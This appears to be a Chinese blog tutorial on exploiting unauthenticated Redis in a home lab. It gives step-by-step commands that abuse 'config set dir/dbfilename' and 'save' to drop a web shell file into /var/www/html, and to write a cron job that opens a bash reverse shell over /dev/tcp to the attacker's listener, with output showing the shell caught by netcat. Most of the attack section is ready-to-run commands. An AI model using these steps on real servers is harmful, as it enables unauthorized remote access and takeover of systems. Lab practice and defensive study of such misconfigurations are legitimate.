• Redi未授权访问的两种利用方式


    前言:redis默认情况下,会绑定在0.0.0.0:6379,如果没有采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等,这样将会将Redis服务暴露在公网上,如果在没有设置密码认证的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。攻击者在未授权访问Redis的情况下,利用Redis自身提供的config命令,可以进行写文件操作,攻击者可以成功将自己的ssh公钥写入目标服务器的/root/.ssh/authotrized_keys文件中,进而可以使用对应私钥直接使用ssh服务登录目标服务器

    0x00 环境配置

    1. 1. kali(攻击机) IP:192.168.2.100
    2. 2. Centos 7.9(靶机) IP:192.168.2.120

    0x01 搭建服务

    1. #将windows本机提前下载好的redis压缩包传输到 Centos 7.9家目录下
    2. scp redis-5.0.3.tar.gz root@192.168.2.120:/root/

    1. #Centos上操作
    2. [root@M1key ~]#yum -y install tar //安装tar命令用于解压文件
    3. [root@M1key ~]# tar -zxf redis-5.0.3.tar.gz //解压缩redis文件
    4. [root@M1key ~]# cd redis-5.0.3
    5. [root@M1key redis-5.0.3]# yum -y install centos-release-scl //安装软件集合包
    6. [root@M1key redis-5.0.3]# yum -y install devtoolset-9-gcc devtoolset-9-gcc-c++devtoolset-9-binutils //安装gcc
    7. [root@M1key redis-5.0.3]# scl enable devtoolset-9 bash //临时修改gcc版本
    8. [root@M1key redis-5.0.3]# gcc -v //查看gcc版本
    9. Using built-in specs.
    10. COLLECT_GCC=gcc
    11. COLLECT_LTO_WRAPPER=/opt/rh/devtoolset-9/root/usr/libexec/gcc/x86_64-redhat-linux/9/lto-wrapper
    12. Target: x86_64-redhat-linux
    13. Configured with: ../configure --enable-bootstrap --enable-languages=c,c++,fortran,lto --prefix=/opt/rh/devtoolset-9/root/usr --mandir=/opt/rh/devtoolset-9/root/usr/share/man --infodir=/opt/rh/devtoolset-9/root/usr/share/info --with-bugurl=http://bugzilla.redhat.com/bugzilla --enable-shared --enable-threads=posix --enable-checking=release --enable-multilib --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-gnu-unique-object --enable-linker-build-id --with-gcc-major-version-only --with-linker-hash-style=gnu --with-default-libstdcxx-abi=gcc4-compatible --enable-plugin --enable-initfini-array --with-isl=/builddir/build/BUILD/gcc-9.3.1-20200408/obj-x86_64-redhat-linux/isl-install --disable-libmpx --enable-gnu-indirect-function --with-tune=generic --with-arch_32=x86-64 --build=x86_64-redhat-linux
    14. Thread model: posix
    15. gcc version 9.3.1 20200408 (Red Hat 9.3.1-2) (GCC)
    16. [root@M1key redis-5.0.3]#make //make编译,编译成功后会在src目录下生成两个可执行文件redis-server、redis-cli。

    注意事项:gcc版本小于5.3编译的时候会报错

    启动服务
    1. [root@M1key redis-5.0.3]# cd src/
    2. [root@M1key src]# ./redis-server

    尝试连接redis服务器
    1. #kali操作机
    2. root@kali:~# apt install redis-tools //安装redis客户端
    3. root@kali:~# redis-cli -h 192.168.2.120 //连接redis客户端,默认端口6379

    可以看到会报错,因为redis默认开启哨兵模式,我们需要在开启redis服务的时候关闭哨兵模式。

    [root@M1key src]# ./redis-server  --protected-mode no

    再次连接就不会报错了

    此时环境就准备好了,可以开始我们后续的步骤了。

    0x02 写shell文件

    tips:由于是上帝视角我们知道网站根目录在/var/www/html下。

    1. 192.168.2.120:6379> config set dir /var/www/html #选网站根目录
    2. OK
    3. 192.168.2.120:6379> config set dbfilename shell.php #设定文件名
    4. OK
    5. 192.168.2.120:6379> set x "\n\n\n\n" #设置文件内容
    6. OK
    7. 192.168.2.120:6379> save #保存
    8. OK

    tips:在写文件内容的时候,redis有可能会在开头或者末尾添加一些banner信息,所以在设置文件内容的时候我们要进行一个换行的操作。

    访问我们上传的文件:

    上传成功!

    0x03 反弹shell

    与写shell的原理一样,只不过我们这次写的文件在定时任务的目录下,设置时间触发一个定时任务,然后kali接收shell。Over~!

    1. #kali操作机
    2. 192.168.2.120:6379> config set dir /var/spool/cron # 选择定时任务的目录
    3. OK
    4. 192.168.2.120:6379> config set dbfilename root # 配置文件名称
    5. OK
    6. 192.168.2.120:6379> set x "\n\n0-59 * * * * /bin/bash -i >&/dev/tcp/192.168.2.100/8888 0>&1\n\n" # 配置文件内容
    7. OK
    8. 192.168.2.120:6379> save
    9. OK
    1. # kali 另外开一个终端
    2. root@kali:~# nc -lvnp 8888
    3. listening on [any] 8888 ...
    4. connect to [192.168.2.100] from (UNKNOWN) [192.168.2.120] 43652
    5. bash: no job control in this shell
    6. [root@M1key ~]#

    成功接收shell。

  • 相关阅读:
    使用vscode下载插件在线打开html界面,解决没有Open in default brower选择问题
    php+微信小程序大学跳蚤市场的微信小程序设计与实现毕业设计源码261620
    Understanding Model Parameters in Machine Learning
    python字符串转list,多维度,支持float,并保持原数据结构
    浅谈安防视频监控平台EasyCVR视频汇聚平台对于夏季可视化智能溺水安全告警平台的重要性
    Redis入门概述
    【数据结构之B树的讲解】
    5、JAVA入门——变量和数据类型1
    M41T62Q6F 一款具有报警功能的低功耗串行实时时钟(RTC)芯片
    网络编程基础
  • 原文地址:https://blog.csdn.net/qq_69775412/article/details/132836870